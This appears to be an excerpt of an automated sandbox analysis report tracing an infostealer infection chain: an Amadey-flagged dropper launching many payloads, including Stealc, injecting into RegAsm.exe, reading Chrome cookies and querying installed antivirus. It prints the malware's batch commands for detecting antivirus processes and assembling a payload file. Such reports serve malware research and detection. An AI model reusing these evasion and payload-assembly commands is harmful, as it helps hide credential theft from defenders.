Source: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 451000
Source: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 466000
Source: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 46D000
Source: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 46E000
Source: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: E1A008

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe "C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe "C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000474001\gold.exe "C:\Users\user\AppData\Local\Temp\1000474001\gold.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe "C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000569001\myrdx.exe "C:\Users\user\AppData\Local\Temp\1000569001\myrdx.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000802001\1.exe "C:\Users\user\AppData\Local\Temp\1000802001\1.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe "C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe "C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe "C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000876001\4ad48d7d65.exe "C:\Users\user\AppData\Local\Temp\1000876001\4ad48d7d65.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Process created: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe "C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Process created: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe "C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Process created: C:\Users\user\AppData\Roaming\ofHIebp8us.exe "C:\Users\user\AppData\Roaming\ofHIebp8us.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Process created: C:\Users\user\AppData\Roaming\Cd0bGrjt9g.exe "C:\Users\user\AppData\Roaming\Cd0bGrjt9g.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000474001\gold.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000569001\myrdx.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Beijing Beijing.bat & Beijing.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 197036
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "CRAWFORDFILLEDVERIFYSCALE" Mtv
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Twisted + ..\Molecular + ..\Sponsorship + ..\Various + ..\Witch + ..\Spirit + ..\See + ..\Fitting T
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif Jurisdiction.pif T
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown

Source: splwow64.exe, 0000001C.00000003.2937746757.0000000002913000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif, 00000029.00000000.3013775872.0000000000526000.00000002.00000001.01000000.00000022.sdmp, Jurisdiction.pif, 00000029.00000003.3043860022.0000000003B43000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: OFF011F112LUQGJPCDB24W.exe, 00000025.00000002.3123162012.000000000110A000.00000040.00000001.01000000.00000021.sdmp	Binary or memory string: oXuProgram Manager
Source: d0d468f327.exe, 00000024.00000002.3867194617.000000000046F000.00000040.00000001.01000000.00000020.sdmp, 4ad48d7d65.exe, 0000002B.00000002.3146758221.0000000000826000.00000040.00000001.01000000.00000023.sdmp	Binary or memory string: Program Manager
Source: axplong.exe, axplong.exe, 00000007.00000002.4556562493.0000000000452000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: +OProgram Manager

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 7_2_0027D312 cpuid

7_2_0027D312

Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: GetLocaleInfoW,	8_2_0025E037
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	8_2_0025E106
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: EnumSystemLocalesW,	8_2_0025515D
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: GetLocaleInfoW,	8_2_00255626
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	8_2_0025D7A2
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: EnumSystemLocalesW,	8_2_0025DA44
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: EnumSystemLocalesW,	8_2_0025DA8F
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: EnumSystemLocalesW,	8_2_0025DB2A
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	8_2_0025DBB5
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: GetLocaleInfoW,	8_2_0025DE08
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	8_2_0025DF31
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: GetLocaleInfoW,	9_2_0025E037
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	9_2_0025E106
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: EnumSystemLocalesW,	9_2_0025515D
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: EnumSystemLocalesW,	9_2_0025DA44
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: EnumSystemLocalesW,	9_2_0025DA8F
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: EnumSystemLocalesW,	9_2_0025DB2A
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	9_2_0025DBB5
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: GetLocaleInfoW,	9_2_00255626
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: GetLocaleInfoW,	9_2_0025DE08
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	9_2_0025DF31
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	9_2_0025D7A2
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	10_2_0041E825
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: EnumSystemLocalesW,	10_2_00414138
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: GetLocaleInfoW,	10_2_0041EA78
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	10_2_0041EBA1
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	10_2_0041E412
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: GetLocaleInfoW,	10_2_0041ECA7
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	10_2_0041ED76
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: GetLocaleInfoW,	10_2_0041465E
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: GetLocaleInfoW,	10_2_0041E60D
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: EnumSystemLocalesW,	10_2_0041E6FF
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: EnumSystemLocalesW,	10_2_0041E6B4
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: EnumSystemLocalesW,	10_2_0041E79A
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,	14_2_00CB7B90

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\1000802001\1.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000474001\gold.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000474001\gold.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000569001\myrdx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000802001\1.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000802001\1.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000808001\12.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000808001\12.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000828001\12.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000828001\12.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000876001\4ad48d7d65.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000876001\4ad48d7d65.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000877001\25e6c25320.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000877001\25e6c25320.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000878001\84d15ff2c9.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000878001\84d15ff2c9.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000879001\03564c0e08.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000879001\03564c0e08.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ofHIebp8us.exe	Queries volume information: C:\Users\user\AppData\Roaming\ofHIebp8us.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\ofHIebp8us.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\Cd0bGrjt9g.exe	Queries volume information: C:\Users\user\AppData\Roaming\Cd0bGrjt9g.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Cd0bGrjt9g.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000474001\gold.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000474001\gold.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000802001\1.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000802001\1.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000802001\1.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000802001\1.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000802001\1.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000876001\4ad48d7d65.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 7_2_0027CB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,

7_2_0027CB1A

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 7_2_002665B0 LookupAccountNameA,

7_2_002665B0

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Code function: 14_2_00CB7A30 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

14_2_00CB7A30

Source: C:\Users\user\AppData\Roaming\ofHIebp8us.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: Amcache.hve.13.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.13.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.13.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: MSBuild.exe, 00000017.00000002.3193253820.0000000005226000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000017.00000002.3466604025.000000000913F000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000017.00000002.3467063856.000000000916F000.00000004.00000020.00020000.00000000.sdmp, d0d468f327.exe, 00000024.00000002.4104424978.0000000005BF3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.13.dr	Binary or memory string: MsMpEng.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 2.2.axplong.exe.260000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.axplong.exe.260000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.axplong.exe.260000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.570000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.4553251957.0000000000261000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2198640444.0000000000261000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2175084729.0000000000571000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
